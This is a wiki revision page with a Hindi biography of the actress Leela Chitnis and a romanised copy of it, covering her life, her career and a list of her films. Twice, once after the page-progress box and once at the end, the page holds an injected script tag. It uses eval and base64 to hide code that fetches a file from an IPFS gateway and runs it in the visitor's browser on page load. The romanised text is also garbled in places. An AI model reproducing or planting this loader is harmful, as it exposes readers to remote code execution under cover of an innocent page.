Difference between revisions of "लीला चिटनिस"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 32: Line 32:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
'''लीला चिटनिस''' ([[अंग्रेज़ी]]: ''Leela Chitnis'', जन्म: 9 सितंबर, 1909 - मृत्यु: 14 जुलाई, 2003) हिन्दी फ़िल्मों की एक प्रसिद्ध अभिनेत्री थीं। लीला चिटनिस ने 52 वर्ष तक अभिनय किया और [[अशोक कुमार]] की नायिका रहीं, तो बाद में अनेक फिल्मों में वे [[दिलीप कुमार]], [[राजकपूर]] और [[देव आनंद]] की मां की भूमिकाओं में आईं। लीला चिटनिस ने अभिनय करने के अलावा एक फ़िल्म 'आज की बात' (1955) का निर्माण और निर्देशन भी किया।  
+
'''लीला चिटनिस''' ([[अंग्रेज़ी]]: ''Leela Chitnis'', जन्म: 9 सितंबर, 1909 - मृत्यु: 14 जुलाई, 2003) हिन्दी फ़िल्मों की एक प्रसिद्ध अभिनेत्री थीं। लीला चिटनिस ने 52 वर्ष तक अभिनय किया और [[अशोक कुमार]] की नायिका रहीं, तो बाद में अनेक फ़िल्मों में वे [[दिलीप कुमार]], [[राजकपूर]] और [[देव आनंद]] की मां की भूमिकाओं में आईं। लीला चिटनिस ने अभिनय करने के अलावा एक फ़िल्म 'आज की बात' (1955) का निर्माण और निर्देशन भी किया।  
 
==जीवन परिचय==
 
==जीवन परिचय==
 
* [[हिन्दी सिनेमा|हिंदुस्तानी सिनेमा]] में आने वाली स्नातक अभिनेत्रियों में [[दुर्गा खोटे]] के बाद लीला चिटनिस का नाम शिखर पर हैं। अपने जीवन में भी पति गजानन यशवंत चिटनिस से तलाक के बाद चार बच्चों की परवरिश उन्होंने बड़े जतन से की और 93 वर्ष की आयु में उनकी मृत्यु भी [[अमेरिका]] में उनके ज्येष्ठ पुत्र के घर हुई।  
 
* [[हिन्दी सिनेमा|हिंदुस्तानी सिनेमा]] में आने वाली स्नातक अभिनेत्रियों में [[दुर्गा खोटे]] के बाद लीला चिटनिस का नाम शिखर पर हैं। अपने जीवन में भी पति गजानन यशवंत चिटनिस से तलाक के बाद चार बच्चों की परवरिश उन्होंने बड़े जतन से की और 93 वर्ष की आयु में उनकी मृत्यु भी [[अमेरिका]] में उनके ज्येष्ठ पुत्र के घर हुई।  
 
* लीला चिटनिस ने अपने पति के साथ स्वतंत्रता संग्राम में इस तरह सहयोग किया कि क्रांतिकारी मानवेंद्र नाथ राय को अपने घर में ब्रिटिश पुलिस की निगाह से बचाकर रखा।  
 
* लीला चिटनिस ने अपने पति के साथ स्वतंत्रता संग्राम में इस तरह सहयोग किया कि क्रांतिकारी मानवेंद्र नाथ राय को अपने घर में ब्रिटिश पुलिस की निगाह से बचाकर रखा।  
* लीला चिटनिस पहली भारतीय [[अभिनेत्री]] हैं, जिन्होंने 1941 में 'लक्स' साबुन के लिए विज्ञापन फिल्म में काम किया। उनके पूर्व केवल हॉलीवुड नायिकाओं को लिया जाता था। परंतु 1930 वाले दौर में पारंपरिक समाज स्त्री को किसी तरह आज़ादी और सुविधा नहीं देता था, तब इन महिलाओं ने [[रंगमंच]] पर अभिनय किया है, फिल्में की हैं और स्वतंत्रता संग्राम में भी सहयोग किया है।
+
* लीला चिटनिस पहली भारतीय [[अभिनेत्री]] हैं, जिन्होंने 1941 में 'लक्स' साबुन के लिए विज्ञापन फ़िल्म में काम किया। उनके पूर्व केवल हॉलीवुड नायिकाओं को लिया जाता था। परंतु 1930 वाले दौर में पारंपरिक समाज स्त्री को किसी तरह आज़ादी और सुविधा नहीं देता था, तब इन महिलाओं ने [[रंगमंच]] पर अभिनय किया है, फ़िल्में की हैं और स्वतंत्रता संग्राम में भी सहयोग किया है।
 
* लीला चिटनिस को [[देविका रानी]] जैसी विरल सुंदर महिला के स्टूडियो में उनके प्रिय नायक अशोक कुमार के साथ अपनी काबिलियत सिद्ध करनी थी। देविका रानी कठोर प्रशासक थीं। प्रेमिका की भूमिकाओं से नए लोगों द्वारा विस्थापित होने के बाद कभी अपने नायक रहे कलाकारों की मां की भूमिका करना आसान यात्रा नहीं थी। लीला चिटनिस अपनी लंबी पारी में कभी भी किसी विवाद में नहीं उलझीं।
 
* लीला चिटनिस को [[देविका रानी]] जैसी विरल सुंदर महिला के स्टूडियो में उनके प्रिय नायक अशोक कुमार के साथ अपनी काबिलियत सिद्ध करनी थी। देविका रानी कठोर प्रशासक थीं। प्रेमिका की भूमिकाओं से नए लोगों द्वारा विस्थापित होने के बाद कभी अपने नायक रहे कलाकारों की मां की भूमिका करना आसान यात्रा नहीं थी। लीला चिटनिस अपनी लंबी पारी में कभी भी किसी विवाद में नहीं उलझीं।
 
==प्रमुख फ़िल्में==
 
==प्रमुख फ़िल्में==

Revision as of 06:44, 16 November 2012

lila chitanis
poora nam lila chitanis
janm 9 sitanbar, 1909
janm bhoomi dharava d, karnatak
mrityu 14 julaee, 2003
mrityu sthan amerika
pati/patni gajanan yashavant chitanis
santan char (4)
karm bhoomi mumbee
karm-kshetr abhinetri
mukhy filmean avara (1951), bandhan (1940), kangan, (1939), kala bazar (1960), iansaf (1937)
shiksha snatak
nagarikata bharatiy
bahari k diyaan lila chitanis ne abhinay karane ke alava ek film 'aj ki bat' (1955) ka nirman aur nirdeshan bhi kiya.

lila chitanis (aangrezi: Leela Chitnis, janm: 9 sitanbar, 1909 - mrityu: 14 julaee, 2003) hindi filmoan ki ek prasiddh abhinetri thian. lila chitanis ne 52 varsh tak abhinay kiya aur ashok kumar ki nayika rahian, to bad mean anek filmoan mean ve dilip kumar, rajakapoor aur dev anand ki maan ki bhoomikaoan mean aeean. lila chitanis ne abhinay karane ke alava ek film 'aj ki bat' (1955) ka nirman aur nirdeshan bhi kiya.

jivan parichay

  • hiandustani sinema mean ane vali snatak abhinetriyoan mean durga khote ke bad lila chitanis ka nam shikhar par haian. apane jivan mean bhi pati gajanan yashavant chitanis se talak ke bad char bachchoan ki paravarish unhoanne b de jatan se ki aur 93 varsh ki ayu mean unaki mrityu bhi amerika mean unake jyeshth putr ke ghar huee.
  • lila chitanis ne apane pati ke sath svatantrata sangram mean is tarah sahayog kiya ki kraantikari manaveandr nath ray ko apane ghar mean british pulis ki nigah se bachakar rakha.
  • lila chitanis pahali bharatiy abhinetri haian, jinhoanne 1941 mean 'laks' sabun ke lie vijnapan film mean kam kiya. unake poorv keval h aaulivud nayikaoan ko liya jata tha. parantu 1930 vale daur mean paranparik samaj stri ko kisi tarah azadi aur suvidha nahian deta tha, tab in mahilaoan ne rangamanch par abhinay kiya hai, filmean ki haian aur svatantrata sangram mean bhi sahayog kiya hai.
  • lila chitanis ko devika rani jaisi viral suandar mahila ke stoodiyo mean unake priy nayak ashok kumar ke sath apani kabiliyat siddh karani thi. devika rani kathor prashasak thian. premika ki bhoomikaoan se ne logoan dvara visthapit hone ke bad kabhi apane nayak rahe kalakaroan ki maan ki bhoomika karana asan yatra nahian thi. lila chitanis apani lanbi pari mean kabhi bhi kisi vivad mean nahian ulajhian.

pramukh filmean

  • dil tujhako diya (1987)
  • bin maan ke bachche (1980)
  • satyay shivam sundaram (1978) Wife
  • jivan mrityu (1970)
  • phool aur patthar (1966)
  • vaqt (1965)
  • gaid (1965)
  • dosti (1964)
  • vatavara (1961)
  • dharmaputr (1961)
  • ganga jamuna (1961)
  • ham dono (1961)
  • parakh (1960)
  • kala bazar (1960)
  • dhool ka phool (1959)
  • naya daur (1957)
  • aj ki bat (1955)
  • avara (1951)
  • bandhan (1940)
  • kangan (1939)
  • iansaf (1937)
  • shri satyanarayan (1935)


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>